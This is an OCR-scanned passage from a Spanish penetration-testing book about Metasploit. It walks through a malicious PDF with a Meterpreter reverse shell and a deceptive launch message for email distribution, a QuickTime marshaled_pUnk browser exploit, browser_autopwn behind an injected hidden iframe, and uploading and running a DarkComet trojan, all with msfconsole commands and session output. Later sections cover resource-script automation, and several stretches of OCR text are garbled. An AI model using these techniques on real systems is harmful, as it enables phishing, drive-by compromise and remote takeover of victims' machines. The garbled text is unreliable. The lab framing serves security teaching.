INFILENAME  /root/Desktop/miPlantilla.pdf 

yes  The  Input  PDF  filename. 

LAUNCH  MESSAGE  To  view  the  encrypted  content  please  tick  the  "Do  not  show  this  message  again 
box  and  press  Open,  no  The  message  to  display  in  the  File:  area 

OUTPUTPATH  /root 

_ _ yes _ The  location  of  the  file.  _ 

Fig  3.10:  Con-figuracifai  para  la  creacion  del  PDF  malicioso. 


Ademas,  hay  que  configurer  el  parametro  PAYLOAD,  en  este  ejemplo  se  ha  utilizado  set  PAYLOAD 
windows/meterpreler/ reverse  Jcp.  Indicando  a  que  IP  se  tiene  que  conectar  el  payload. 


Una  vez  configurado  se  ejecuta  el  comando  exploit  y  se  genera  el  fichero  PDF  malicioso.  Se  puede 
empezar  la  distiibucion  medlante  el  correo  electronico,  pero  a  la  vez  se  debe  estar  preparado  para 
lecibir  las  conexiones  o  sesiones  remotas.  Para  ello  se  carga  en  msfconsole  el  modulo  exploit/multi/ 
handler.  Este  manejador  sirve  para  que  cuando  la  vlctima  ejecute  el  archivo  y  el  payload  realice 
la  conexion  inversa  al  atacante,  este  modulo  gestionara  este  proceso  dando  acceso  at  atacante  a  la 
maquina  remota. 
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Este  modulo  se  configure  de  manera  sencilla,  simpiemente  se  debe  indicar  que  tipo  de  payload  sc 
espera  y  cual  es  la  direction  IP  local,  es  decir,  a  la  que  el  payload  se  va  a  conectar. 

l&f  exploit(handler)  >  set  PAYLOAD  windows/meterpreter/reversetcp 

PAYLOAD  =>  v/indows/me  te  rp  rete  r/  re verse_tcp 

ffiSf  exploit (handler)  >  set  LHOST  192.168.8.62 

LHOST  ->  192.168.6.62 _ _ _ _ 

Fig  3.11:  Configuration  del  manejador  de  Metasploit. 

Una  vez  que  las  posibies  vfctimas  han  abierto  el  correo,  ban  ejecutado  el  archivo  PDF  y  disponen  de 
una  version  de  la  aplicacion  vulnerable  se  niuestra  un  wanting  al  usuario.  Es  por  ello  que  ej  mensaje 
que  se  introduzca  en  el  parametro  LAUNCBjVtESSAGE  es  importanle  que  sea  cretble,  un  toque 
de  ingeniena  social.  El  usuario  pulsa  sobre  open  y  se  estara  ejecutando  el  payload  en  la  maquina  de 
la  victima. 


Fig  3. 12:  Ejecucion  del  PDF  por  parte  de  la  vlctima. 

La  explotacion  devuelve  una  consola  de  Melerpreter  y  el  usuario  o  vlctima  puede  segii  ir  visualizando 
el  PDF,  el  cual  muestra  el  contenido  de  la  plantilla  utilizada  para  crear  el  PDF  malicioso. 

einsf  exploit  (handier)  >  exploit  ' 

(*]  Started  reverse  handler  on  192.168.8.62:4444 
[*]  Starting  the  payload  handler... 

(*3  Sending  stage  (749056  bytes)  to  192.168.0.61 

{*]  Meterpreter  session  1  opened  (192.168.6.62:4444  ->  192.168.0.61:2321)  at  2012-96-27  03.09:21 
+0200 

meterpreter  >  background  , 

ms f  exploit(handlar)  >  sessions  -l 

Active  sessions 


Id  Type 

1  meterpreter  x86/win32 


Information  Connection 


192.168.6.62:4444  ->  192.168.0.61:2321 


Fig  3.13:  Oblencion  de  la  sesion  inversa  de  Meterpreter. 


PoC:  QuickTime  y  sus  conexiones  por  Ruben  Santamarta 

A  finales  del  ano  2010,  salio  una  de  las  vulnerabilidades  mas  importantes  en  los  uitimos  tiempos 
en  lo  que  se  refiere  a  Apple  y  sus  productos.  Ruben  Santamarta,  investigador  espanol  de  seguridad 
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y  muy  conocido  como  reversemode ,  saco  a  la  luz  publics  esta  vulnerabilidad  y  su  correspondiente 
exploit  el  dial  permitia  a  un  atacante  ejecutar  codigo  arbitrario  en  Jas  versiones  XP  de  Windows  con 
SP3.  Esta  vulnei abilidad  se  encontraba  escondida  en  QuickTime  Player  y  llevaba  9  anos  alii.  La 
vulnerabilidad  se  debe  a  tin  parametro  denominado  JAarshaled _pUnk ,  en  eJ  visor  de  QuickTime 
que  se  utiliza  para  cargar  elementos  desde  la  ventana.  Segun  comentaba  Rubdn  Santamarla,  cuando 
publico  su  exploit  cn  el  artlctilo  kit p://www.reversemode. com/index. php?option=com_content&i  ask 
-■  view&id~6 (M  ltemid= ./,  parece  que  alguien  se  olvido  de  iimpiar  esta  funcionalidad. 

L!  <1  In  despues  de  que  Ruben  liberase  este  Oday  que  afectaba  a  las  ultimas  versiones  de  QuickTime, 
pm  aquel  entonces  »a  7.6.6  y  la  7.6.7,  los  desarrolladores  de  Metasploit  liberaron  un  modulo  para  el 
framework. 

El  escenario  de  la  prueba  de  concepto  es  el  siguiente:  existe  un  atacante,  con  una  distrilnicidn 
IkickTrack  que  quedara  a  la  espera  de  que  las  victimas,  que  ejecuten  una  version  de  QuickTime  7.6.7 
o  inferior,  se  conecten  a  un  recurso  propuesto  por  el  atacante.  ^Como  se  logra  que  las  victimas  se 
eonecten  a  la  maquina  del  atacante?  Esta  pregimta  tiene  muchas  respuestas,  y  normalmente  se  puedc 
contes tar  con  la  palabra  imaginacion.  No  existe  un  metodo  unico,  y  siempre  cada  metodo  puedc 
ser  ejecutado  con  toques  interesantes  de  creatividad  e  imaginacion.  Por  ejempio,  el  atacante  puede 
haber  distnbuido  una  gran  cantidad  de  links  por  foros,  blogs,  redes  sociales,  correos  eleclrcnicos, 
etcetera  que  redirijan  a  una  vlctima  a  la  direccion  IP  y  al  recurso  malicioso  del  atacante.  En  muchas 
ocasiones,  la  vlctima  no  sera  vulnerable  al  exploit,  ya  sea  porque  no  dispone  de  esa  aplicacion,  o 
porqtie  la  aplicacion  esta  parcheada. 

Otro  metodo  interesante  es  mterceptar  el  traftco  de  las  victimas,  encontrandose  en  la  red  local  del 
atacante  y  redirigirla  hacia  el  recurso  malicioso.  Quiza  uno  de  los  metodos  mas  interesantes,  y  que 
es  muy  util izado  en  el  mundo  real  para  distribuir  malware,  es  disponer  de  una  serie  de  paginas 
hackeadas  a  las  que  se  coloca  un  [frame  transparente  que  apnnta  hacia  el  recurso  malicioso.  En 
este  case  cuando  la  vlctima  entra  a  la  pagina  web  real,  su  navegador  carga  el  iframe,  el  dial  apunta 
hacia  el  recurso  malicioso  y  se  puede  Jlevar  a  cabo  la  explotacion,  sin  mas  interaction  por  parte  de 
la  vlctima  que  el  simple  acceso  a  un  sitio  web. 

asf  >  search  marshaled  '  ~~  — - — — - - - — — 

[‘J  Searching  loaded  modules  for  pattern  ’marshaled1 .. . 

Exploit 5 

Na“°  Disclosure  Date  Rank  Description 

.  iiuS5n«I...7 

ms.f  >  use  exploit/windows/browser/apple  quicklime  marshaled  punk 
jsf  exploit (apple  quicklime  marshaled _punk)  > 

Fig  3.14:  Carga  del  inddulo  marshaled jnmk  para  Apple  QuickTime  7.6.7. 

Tras  buscar  marshaled  en  t\  framework  se  carga  el  modulo  y  se  prepara  el  entorno  para  que  cuando 
el  cl i enle  realice  la  petition  y  ejecute  la  aplicacion  vulnerable,  client  side  attack,  el  exploit  rt alice  el 
trabajo  y  devuelva  el  control  de  la  maquina  remota.  '  : 
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exploit  Target:  . .  . . — — - - - — __ _ _ 

Id  Name 

0  Apple  QuickTime  Player  7.6.6  anti  7.6.7  on  Windows  XP  SP3 

msf  exploit (applejjuicktii!ie_raarstialed  punk)  >  set  SRVHOST  192.168  8  62 
5RVH0ST  =>  192.168.0.62 

15l  exploit ( apple  _quir.ktime  marshaled  punk)  >  set  SRVPORT  80 
SRVPORT  =>86 

Elf  exploit  (npplB_quicktii*o  marshaled  punk)  >  set  URIPATH  /luenos 
URIPATH  =>  /jueges  ~ 

Elf  exploit ( appl e_quicktiae_ma rsh  a  ledpunk )  >  set  PAYLOAD  windows/meterpreter/reverse  ten 
PAYLOAD  =>  windows/meterpreter/reverse  tep  ‘  ~  v 

Elf  exploit {app1.a_qtiickt.iine  marshaled  punk)  >  set  LHOST  192.168  0  62 
LiMS5I._=>-.1 92,168. 8, 62  _ _ 

Fig  3.15:  Configuracion  del  modulo  marshaled jjunk. 

La  configuration  es  sencilla,  se  deben  asignar  valores  a  las  variables  o  a  los  pardmetros  siguientes: 


Parametro 

Valor 

SRVHOST 

La  direccion  IP  donde  se  implement  ei  recurso  malicioso  o  exploit 

SRVPORT 

Se  debe  indicar  el  puerto  que  quedara  a  la  escucha,  para  simular  un  recurso 
web  es  importante  asignarlo  en  el  80 

URIPATH 

Recurso  al  que  se  qtiiere  acceder.  En  el  ejempio  se  indica  /juegos,  pero  1 
bastarla  con  / 

PAYLOAD 

Se  debe  indicar  el  payload  a  ejecutar  en  la  maquina  vulnerable 

Tabla  3.02:  Configuracion  del  modulo  mnrsluiledjnmk 

hnsi  exploit  (apple  quicklime  marshaled  utmK)  >  exnloit  - — - 1 

(*)  Started  reverse  handler  on  192. 168.0. 62 :<W4 
!*]  Using  URL;  http://192.16B. 0.62:80/juegos 
(■*)  Server  started. 

EiX  exploit { a,»ple_quicktimB_tna rshnled  punk )  >  (*]  sending  Apple  QuickTime  7.6.7  Marshaled  nUnk 

Code  Execution  exploit  HTML  to  192. 16B, 0.61: 1635...  _irarsnaiea_punJt 

t*J  Sending  stage  {749056  bytes)  to  192. 16B. 0,61 

l+0206tCrP  eter  SeSSi°n  1  0Penefi  E92. 168. 0.62:4444  ->  192.168.0.61:1636)  at  2012-06-27  02:16:09 

h)  Session  ID  1  (192.168.0.62:4444  ->  192.168,0.61:1636)  processing  InitialAutoRunScript  ’migra 

!*]  Current  server  process:  IEXPLORE.EXE  (2680) 

I*1)  Spawning  a  notepad.exe  host  process... 

I  *  1  Migrating  into  process  ID  4036 

1*1  New  server  process:  notepad.exe  (4036) 

ttf*cd6n:[(ghttp:/M92.l6B.0.62/iuegps  . . - . . 


I'ig  3.16:  Explotacion  lograda  con  el  modulo  marshaled jpunk, 
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Fig  3. 1 7:  Kit  de  explotaciftn  Black  Hole. 


Una  de  las  vias  mas  importantes  para  la  distiibucion  de  malware  son  los  sitios  web,  utilizando  un  kit 
de  explotacion,  como  puede  ser  Black  Hole,  Eleonore  o  Phoenix  Exploit .  Estos  kit  de  explotacion 
disponen  de  gran  cantidad  de  exploits  publicos  y,  si  se  paga  lo  suficienie  en  el  mercado  underground , 
de  exploits  privados.  Dichos  exploits  privados  proporcionan  al  atacante  una  ventaja  sobre  miichos  de 
ios  usuarios  que  caeran  en  sus  redes  eon  fines  maliciosos. 

Adernas,  disponen  de  poneles  que  aportan  .facilidad  de  uso  y  gran  informaeion.  Muchos  de  el  los 
oliecen  estadlsticas  de  los  navegadores  explotados,  ios  palses  de  las  victimas,  porcentaje  de  exilo, 
exploits  que  mas  acierto  han  tenido,  ei  sistema  operativo  mas  explotado,  etcetera. 

El  proceso  no  es  trivial  pero  una  vez  estudiado  no  es  de  gran  complejidad.  La  idea  es  que  el  atacante 
selecciona  las  victimas  a  traves  de  un  programa  automatico  que  busca  patrones  en  los  buscadores 
como  Google  o  Bing.  Una  vez  se  obtiene  la  lista  de  sitios  que  son  vulnerables,  se  realizan  ataques 
SQL  Injection  a  todos  ellos,  cuyas  inyecciones  estan  preparadas  para  introducir  codigo  malicioso  en 
la  pagina  web.  El  codigo  malicioso  que  se  introduce  carga  el  eontenido  de  una  direction  que  sera 
donde  se  encuentre  el  kit  de  explotacion.  De  este  modo,  cuando  un  visitante  navegue  por  el  sitio  web 
vulnerado  sera  atacado  con  un  exploit  que  tratara  de  ejecutar  un  malware  en  su  maquina. 

Como  ejemplo  de  un  hecho  real  se  muestra  a  continuacion  uno  de  los  varios  ataques  sufridos  por  la 
web  de  Apple.  Tambien  hay  que  decir  que  Apple  ha  trabajado  siempre  de  manera  rapida  para  limpiar 
toda  referenda  a  sitios  web  maliciosos.  En  la  imagen  se  puede  visualizar  como  se  inyectb  un  i frame 
que  referenciaba  al  sitio  web  malicioso  en  el  interior  del  sitio  web  de  Apple.  El  sitio  ai  que  se  referlan 
era  al  dominio  nemohuildiin.ru,  pero  la  victima  podrla  no  detectar  ninguna  accion  extraha  ya  que  si 
el  {frame  fuese  transparente  no  se  visuaJizarla  nada  extrano. 

j  site:  apple.com  nemohuHcliin.ru  _  j  Buscar 

2  rcautBd05  («.se  MjunEos)  '•  Biisqceita  «van:i!ila 
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Fig  3. 1 8:  Busqueda  de  sitios  hackeados  que  distribuyeu  malware. 


PoC:  La  tdcnica  Browser  Autopwn 

En  la  siguiente  prueba  de  concepto  se  utilizara  el  modulo  browser  autopwn,  ei  ctral  ofrece  la 
posibilidad  de  lanzar  exploits  de  acuerdo  a  la  version  del  navegador  que  la  victima  este  utilizando. 

El  escenario  dispone  de  2  maquinas,  una  sera  el  atacante  con  un  equipo  Windows  XP  SP3  que  dispone 
de  un  servidor  WAMP  el  cual  ofrecera  una  pagina  web  maiiciosa,  simulando  un  sitio  hackeado,  diclia 
pagina  web  dispondra  de  un  {frame  transparente  que  referenda  a  una  maquina  donde  se  encuenlra  el 
modulo  browser _autopwn  esperando  para  lanzar  los  exploits.  En  ei  escenario  el  modulo  se  enconirad 
en  un  Metasploit  en  la  misma  maquina  del  WAMP,  es  decir,  en  la  maquina  tlel  atacante.  Por  otro 
iado,  se  dispone  de  una  maquina  que  sera  la  de  la  victima,  corrienclo  un  Windows  XP  SP 3,  en  la 


la  miquino  de  la  victima  se  realizani  h  dia‘,  ihn  ^  f  q"  Se  0blenga  el  COI,tro1  remote  de 
ulilizara  DarkCommet,  La  1 %L Z  ,™  ’  T  “*  ^  ^  - 

Meterpreter.  Con  eSte  metodo  se  pueden  obtene -  itcHdT  ^  ^  *  '*  “nsol»  «o 
SCI' PMte  d“  Una  b0"K'  s'mPlomente  por  navegan  por  sides  htt^T™ 

La  maquina  de!  atacante  dispone  de  la  direccion  IP  IQ')  iar  n  sr  , ,  , 

y  el  modulo  de  Melasphit.  La  maquma  de  la  vinii  T  r  ”  5>  en  eila  sc  aloja  el  sitio  web  malicioso 
in  siguiente  prueba  de  concepto!  1,113  d*P°"e  de  la  di^i6iUP  192.168.0.57  para 

Lti  pi  imti  lugar,  se  ha  instalado  un  servidor  WAMP  pn  la  ma  ■  >  < 

,WM’ se  *»>  cdocado  un  sitio  web  que  sinu.li  h  de<  ^cante  y  en  la  ruta  i vamp/ 

web  puede  ser  clonada  con  distinta  h  T  “  “e0,ttrafi*  ****•  U  P*gi  a 

de  lipo  biliary,  bromer  mlo^  **«"*■-  m&tulo, 

expl0,,s-  La  con  figuraci  on  se  puede  visualizar  en  la 1  ***  '***  loS 

Para  metro  ~  ~~  “  ~ — — - - - - ___ 

- 1 - - .  Valor 

inVTOs  de  - - 7 

— 

TiiWa  3.03: Con%„,aci6„  ’ 


I  ^ »T5r>ji ) 

|fW;^4?2.16dvb,S6,  •  - 


WMi^*  **>&»**>  -  *:*:J?*i  ■ 

|jrtjiATHXiJ,/iy*-'':UriS'  •a!Ur'!ani)  *  aer  WIPATH  /  v 


r.g  3.19:  Configuracion  del  modulo  bromer  autopwn 
Una  vez  que  se  dispone  del  modulo  a  la  espera  de  recihir  ^  • 

lener  M  cuenta  que  la  web  maliciosa  debe  caLr  un  Z  t  ^  *"  el  pt,erto  8080>  «  «tebe 

,W  a  :t,6nde  se  encuentra  el  modulo  browser  autopwn  pJT^T  ^  *immk  en  Slf «""!» 
ocurnna  en  un  ataque  real,  se  edita  el  sitio  web  yse^ofocTe  7'"'  de  c6di^  c™° 

fa  nnageii.  we[7  *  se  coIoca  el  {frame  como  se  puede  visimlizat  en 


</bocly> 

|</ht)ni> _ 

I  'g  J.20:  Inyeccion  de  .frame  en  el  codigo  de  la  pagtm,  web. 

can  ten  ido,0tamW6n^ga?a  el  Iframe  que  realirarTlipeiic^on  TT  ^  y  tlas  ca^r  ^ 

4  zaia  lapelicion  a  la  direcfcion  http://] P2. 168.0.56:8080. 
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Generalmente,  en  un  ataque  real,  esta  peticion  se  realizaria  a  un  doiuiiiio  publico  adquitido  para 
distnbuir  malware  o  que  tambien  ha  sido  comprometido  y  dispone  de  un  kit  de  explotacion  detraP 
Para  hacer  mas  real  la  simulacion  se  ha  utilizado  el  sitio  web  de  un  congreso  de  tecnologia,  y  se  bm 
modiftcado  el  archive  hosts  de  la  victima  para  que  cuando  se  introduzca  la  direccion  real  se  cargt 
la  web  que  sirve  e!  atacante.  Se  entiende  que  en  un  ataque  real  esto  no  se  llevada  a  cabo  as!  v 

Direccioii  |  >wiw.rediiWis>.toai|  .  '  . Ijjj  £l  jL  L  l'V«ictfog  " 

Biisquetlfl  [rnlgsass  VMm  Maes  Nolidas  Shopping  Gmail  Mac  y 

iSaads  I  aslatiaLwoh  I  Configuracion  »  i  iniciar  sesifri 

Fig  3.2 ! :  Navigation  de  la  victima  a  la  web  hackeada. 


Una  vez  que  la  victima  navega  por  el  sitio  web  y  el  {frame  oculto  hace  su  trabajo,  el  modulo  de 
Meiasploit  recibira  la  peticion  y  lanzara  los  exploits  disponibles  para  esa  version  del  navegador.  Uni 
vez  que  Metasploit  empieza  a  realizar  este  trabajo  s61o  queda  esperar  a  conseguir  la  sesion  inversai 


0 *-7  y; ;  ;  to»;o^arsw.of.tjn  -  MepopUm ’ ■  \ imjum^fklcKttsot%.  wiftclo; 

L'LJ/^a^fifeiiiOvSr . l^BeifeaUfopwn  *- ife^OntUnc)  with" i<»  exWoits" ' 

| •iftyofcea’teobaeei;  -  Sending  fiKpicdu  iHTHt,. ; .  \  :  7 

fetL7?|0@’Or5?’;i::}  'i'feVqr'ehteob ject '  v  sending  expJ.Difc.:.HTHK..> ..  7:'-  '  ■  .  .'v 

Jwi  ^i&SvaSa^p; :  ,.-iitel0c_0ia^iejDebavioL-j3  —Sending  Internet  KMplGter'-plmili,  i 
Free  (Carctet  i  IE  C  fJPO-SPG '  (onciiok) ) 

J  l  tti-t h  pS fet ei.  'seS3  Idn  t  apened  ( tn2 .  jfifu o . Sp : 3533  ->  to„U'ei.i| . 57 s  IU7)  1f 
:?P12--%7neS;  I0:be^ft;+03po  '.  :  f4/z. 

V  1  »19i.Xb8.0.D«:333a  192-166.0.57:1117)  pryceasahCf  IhUiGU 

'-..,7  '  ..  ■,  .  <-  :  .■  ;  .•  .  yl 

J'"  jCiifenL-seirverfipiidce^::  (780)  ‘ ..  '.-,7 

S}t»a»irf’nif‘.ftbtegndfexe  pcoeess  to  Migrate  to  '  '  •  ,  .  '  1  •• 

W71iigi:ating:tD;',1064.  ■: .... .i;  . \:  .■  '  .1:  .  :/  . 

f  •i-l"  SyccfisainM  g  :)ipigy  at-ed-  to  -  process  ■  '  : 


Fii 


jpwn  Ianzanclo  exploits , 


Es  muy  interesante  observar  que  cuando  se  ha  conseguido  la  sesion  inversa  de  Meterpreter,  se  ha 
migrado  la  consola  a  otro  proceso,  lo  cual  provoca  que  aunqiie  el  navegador  se  cierre  o  se  bloquee,  la 
conexion  no  se  perdera  ya  que  ha  sido  mudada  a  otro  proceso.Para  la  distribueion  de  malware  se  ha 
utilizado  el  comando  upload  de  la  consola  de  Meterpreter  para  subir  un  archivo.  El  tfoyano  elegido 
para  la  prueba  de  concepto,  como  se  menciono  anteriormente,  es  DarkCommet.  DarkCommet  tiene 
un  funcionamiento  de  troyano  inverse  muy  sencillo,  se  subira  a  la  victima  el  eject. table  que  hace  tie 
servidor  y  se  ejecutara  mediante  el  uso  del  comando  de  Meterpreter  execute ,  que  permite  ejecutar 
aplicaciones  en  la  maquina  remota. 


-anxi lit rfry (W. o asm  .. swi'- o g i.:;; )  , sessions  -i  l 

f  f  Starting  Interaction  with  l, . « 

meterpreter  >  upload  esWtroyano.exe  ojW 
I J  * !  uploading  ;  * } \ tco.yano-. exe-  :~>  c??l ' 
f ' :  .  uploaded  :  c :  \  tfoyano .  e:-:e  ti\\  troyano .  exe 

meterpreter  v  execute  -£  e:\\ troyano. exe 
Process  32|0  created. 

meterpreter  >  |  i 


Fig  3.23:  Distribucidn  de  malware. 
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Una  vez  la  maqinna  ha  sido  troyanizada,  DarkCommet  se  conectara  con  el  atacante  automaticamente. 
En  la  generaeion  de  tin  hot  de  DarkCommet  se  debe  especificar,  al  menos  una  direccion  que  sera 
donde  se  conecte  el  bat  dando  el  control  de  !a  maquina.  El  atacante  dispondra  de  un  nombre  de 
c tominio  por  ejemplo  un  dyndns,  para  no  utilizer  las  direeciones  IP  dinamicas.  Aunque,  si  el  atacante 
dispone  de  una  direccion  IP  estatica  tambten  podrra  usarla. 


Pig  3.24:  Ei  troyano  se  conecta  al  panel  de  administration. 


5.  Automatizando  las  ordenes 

Tras  ver  la  parte  de  intrusidn  o  explotaoion  de  sisleraas,  en  la  que  si  se  oonsigite  el  exito  la 
adienalma  sube  a  gran  velocidad,  hay  que  pensar  de  nuevo  en  el  proceso  complete  del  test  de 
intrusion.  Anteriormente,  se  ha  estudiado  como  la  recoglda  de  informacion  y  descubrimiento  de 
servtcios  es  algo  que  puede  llevar  bastante  tiempo,  pero  es  algo  que  puede  ser  automatizado,  ya  que 
generalmente,  ei  proceso  tiene  mas  sspectos  de  procedimental  que  de  artistico. 

La  automatization  de  las  tareas  a  realizar  en  Metasploit  es  un  proceso  que  puede  ayudar  al  auditor  a 
mmimizar  tiempos.  Como  se  ha  mencionado  anteriormente,  en  un  test  de  intrusion  existe  gran  parte 
c  e  piocedimiento,  el  cual  en  condiciones  normales  es  siempre  igual,  y  una  parte  menor  que  depende 
de  la  experiencia  o  pericia  del  auditor,  la  parte  mas  artistica. 

La  idea  principales  es  conseguir  reunir  ei  mixirno  detalle  en  el  workspace  de  la  base  de  dates  a  la 
que  el  auditor  conecte  ei  framework.  Entonces,  <,Se  puede  automatizar  la  captura  del  maximo  de 
informacion?  Esto  es  la  idea  de  los  resource  scripts,  cuya  extension  sera  rc. 

Los  resource  scripts  son  tratados  por  e\  framework  como  templates  ERB  al  permitir  la  ejecucion  de 
bloques  de  instrucciones  en  Ruby,  desde  los  cuales  se  podra  interactuar  con  la  API  de  Metasploit , 
REX.  Existen  algunos  rc  que  vienen  por  defecto  en  Metasploit  en  la  ruta  /penlest/exploits/ 
Jramework3/scripts/resource. 

Con  los  scripts  que  vienen  por  defecto  con  el. framework  se  puede  realizar  la  mayoria  del  (rebate 
de  recoptlacion  de  mformacten  del  entorno  a  auditar.  A  continuacten  se  estudia  uno  de  los  scripts 
que  vienen  por  defecto  y  que  es  reahnente  interesante  y  util  a  ia  hora  de  descubrir  servicios  y  de 
recolectar  informacion. 
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Ejemplo:  Descubrimiento  basico 

En  este  apartado  se  entra  en  detalle  en  la  description  del  script  basic  Jiscoveryrc  que  se  puede 
encontrar  en  la  mte/pentesl/exploUs/framework3/scripts/resource.  Este  script  sirve  para  conseguir 
obtener  informacion  sobre  maquinas  y  servicios  disponibles  utilizando  nmap  y  olros  modules 
auxiliares,  algunos  de  los  vistos  anteriormente  en  este  libro,  para  protocolos  smb,  imap,  pop ,  http, 
ftp,  etcetera. 

A  continuation,  medianle  el  uso  de!  comando  cat  <scripl.rc>  |  more  se  va  a  anaiizar  e!  script.  Hay 
que  teller  en  cuenta  que  se  puede  personalizar  en  functor)  de  las  necesidades  editando,  simplcmerile, 
el  archivo  rc  original  medianle  a  1-gun  editor  de  textos. 

Lo  primero  que  se  puede  observar  en  la  imagen  es  la  declaration  de  una  variable  denominada  party 
que  contiene  todos  los  puertos  que  seran  analizados  en  busca  de  servicios.  El  auditor  puede  modificar 
e!  rango,  ampliando  o  disminuyendo  el  numero.  Un  concept©  muy  interesante  es  el  datastore  el  cual 
almacena  las  variables  que  se  configuran  en  msfconsole,  por  ejemplo  RHOSTS,  LHOST,  RPORT, 
etcetera. 

Para  interactuar  desde  e!  interior  del  script  con  estas  variables  del  framework  se  utiliza  la  sintaxis 
framework. datastore[‘<nombre  variable].  En  el  script  se  puede  observar  como  se  hacen 
comparaciones  medianle  el  uso  de  condicionaies  if  para  poder  verificar  que  antes  de-lanzar  el  script 
se  configuraron  las  variables. 

En  el  caso  de  la  variable  NMAPOPTS,  define  las  opciones  con  las  que  se  ejeculara  nmap,  si  no  csta 
declarada  dicha  variable  en  ei  datastore  se  declarara  en  el  script  con  unos  parametros  por  defecto, 
tal  y  como  se  puede  ver  en  la  imagen. 

kset  Dorts  for  Metasploit  portscanner  (change  this  for  your  needs): 

oorts  -  2122  3  25  43,50,53,67.68,79,881169,110,111,123.135,137,138,139,143,161,264.265,389, 

443^44^500^631^901)995, 1241  i  1352, 1433, 1434, 1521, 1720, 1723,3306,3389,3786,4662,5800,5801,5802,58 
03 , 5900 , 5901 , 5902 , 5903 , 6000 ,6666 , 8090 ,8080, 8443 , 10000 , 10043 , 27374, 27665 

if  (framework. datastorel 'RHOSTS' }  —  nil) 

print  line ("you  have  to  set  RHOSTS  globally  ...  exiting  ) 
return 
end 

if  (framework. datastoref ‘NHAPOPTS’ ]  !=  nil) 

nmapopts  =  frafflework.datastore[*HHAPOPTS,] 

else 

^default-settings 
nmapopts  =  “-PN  -PS  -0  -sSV“ 

end  _  — — - - - — - — - - 

Fig  3.25:  Parle  tie  codigo  del  script  basic discovery.rc. 

Para  la  ejecucion  de  modulos,  tras  la  configuration  de  variables,  o  incluso  para  configurer  variables 
desde  el  interior  del  script  se  dispone  de  la  sentencia  run  jingle.  Para  asignar  un  valor  a  una  variable 
del  framework ,  es  decir  no  local  al  script,  como  por  ejemplo  RHOSTS  se  utiliza  run  jmgle(  sctg 
<variable>  <valor>  ").  Para  ejecutar  una  sentencia  en  el  framework  desde  el  script  serta  similar  a 
to  anterior  nmjingleCdbjimap-v-n  ^{nmapopts}  tt{ framework. datastoref  'RHOSTS ]}  ’ ’) .  Las 
variables  se  especifican  medianle  el  uso  de  # {variable}. 
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if  (  nmap  =»  i  )  “  “  — - — - — — - . — _ 

print_line( "Module:  db_nmap") 
if  (verbose  —  1) 

.datastoref'RHoSTS']}"}  nC^  USin3  N:”aP  With  t,te  followin9  options:  -v  -n  #{nmapopts>  # {framework 

else  n,n_sin9le( "dbjiraap  -v  -n  #{ninapopts>  #{frafnework.datastoref 'RHOSTS1]}"? 

tastorel-RHOSTS'irr1"^"051"9  ^  M  the  f°Uowin9  options:  -  ««*popti)  framework, da 
m  njn_single ( " d b_nmap  -n  #{nmapopts}  ^framework.datastorefRHOSTS1]}"} 

else 

print  line ( "Module :  portscan/tcp" } 

run_singie{“use  auxiliary/scanner/portscan/tcD") 
run  single ("set  PORTS  #{ports}") 
run_single("run  -i") 

end  | 

~  — _ _ _ _ _ J 


Fig  3.26:  EjecucMn  de  senfencias  desde  el  interior  dei  script. 


d6nde  r,!tad4n  e"  f  rrqU/  Verif,Ca  Si  el  auditor  se  <™«tado  a  la  base  de  dales 

tee  e  n  rerX  ™  ^  d  Si  «-  «  esta  coneclado  ^ 

instrutcianS  ""  P°r  i"dicSndo,°  5'  *  ^ari  h  ejeocifin  de 


f  Test  and  see  if  we  have  a  database  connected  “ 

begin 

frasiework.db.hosts 

rescue  ::ActiveRecord: :ConncctionNotEstablished 

returnerr0r^UDatabaSe  ccmnection  isn‘t  established" 

pnri 


Fig  j.27;  Test  de  conexion  de  la  base  de  datos  en  el  script. 


el  IT  P“  i'  ™  ejeCUCi6n  dd  SCrlp‘ y  18  °bfenci™  tle  rcsl"‘ados  “ediimte 
intZ^P  I *  aUf°mateaci6n-  ReTOrda"d0  s"  «n«hd  pan,  la  mayorrn  de  Ios  test  de 
tZbiltde-t  reC“We  estudiar  los  distintos  qw  dispone  el framemrk  y  w 

de  in'nm  Vi  es’ ya qui! l,tI,izando varies de ellos en conjunto se puedeobtener oran caniidnd 
t^r  e'  eM0ra0  a  6  indUS0  C^uir  realizar  explores  eon  a^os  de  t 


ffisi  >  resource  basic  discovery.  rc  .  _ _ 

!*]  for  ™  directives . 

you  have  to  set  RH0ST5  globally  exiting  ource/bas^_disccvery.rc)>  Ruby  Code  (20261  bytes) 

fsf  >  set  RH0STS  192 .160.0.59  3 

RHOSTS  =>  192.168.0.59 

fflsf  >  resource  basicdiscovery  rc 

s  ^ » directives. 

THREADS  =>  15  /scnpts/resource/basic  discovery . re)>  Ruby  Code  (20261  bytes) 

H  Database  connection  isn't  established 
msf  >  | 

F'g  128:  EjeCl'ci6n  (,e  basic Jiscowry.rc  con  error  por  conexion  base  de  dates.  ~J 
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Uno  de  ios  errores  mas  commies  es  ia  no  conftguracibn  de  las  variables  en  el  framework  antes  de 
lanzar  el  script,  ya  que  pnede  que  este  las  requiem  previamente  configuradas,  por  otro  lado,  otto 
los  errores  comunes  es  la  no  conexion  a  la  base  de  datos  cuando  el  script  lo  requiere. 

msi  >  db  connect  postgres :  123abc  @127 .0.9. 1/ntsf  '  ' 

msf  >  resource  basic  discovefy.rc 

("1  resource  (basic_discovery.rc)>  Ruby  Code  (18075  bytes) 
starting  discovery  scanners  ...  stage  1 


starting  portscanners  . , . 
udp_sweep 

Kf  Auxiliary  module  running  as  background  job 
Module:  (Jbjimap 

Using  Nmap  with  the  following  options:  -n  -si  -P0  -A  192.160.0.59 

f*]  Sending  10  probes  to  192. 168.0. 59->192. 168.0. 59  (1  hosts) 

I’J  Discovered  ntp  on  192.168.0.59:123  (Microsoft  NTP) 

f1* ’  Discovered  netbios  on  192.168.0.59:137  (PRUEBAS-01760CC:<00>:U  :PRUEBAS-017f 
0CC : <29> : U  :GRUPO_TRABAJO:<00>:G  :GRUPO_TRABAJO:<le>:G  :GRUPO_TRABAJ0:<ld>:U  :|f 


Fig  3.29:  Ejecucibn  corrects  de  basicjHscovery.ro. 


Creadon  de  nn  resource  script 

Antes  de  crear  scripts  de  automatizacion  de  tareas  se  debe  disponer  de  un  par  de  cosas  claras,  la 
primera  es  que  se  debe  conocer  el  lenguaje  de  scripting  Ruby  y  la  segiinda  que  se  debe  disponer  cle 
un  conoeimiento  medio-alto  de  ia  arquitectura  y  funcionamiento  de  Metasploit. 

A  continuacion  el  ejemplo  que  se  muestra  es  bastante  sencillo  e  intuitivo,  pero  queda  reflejado  el 
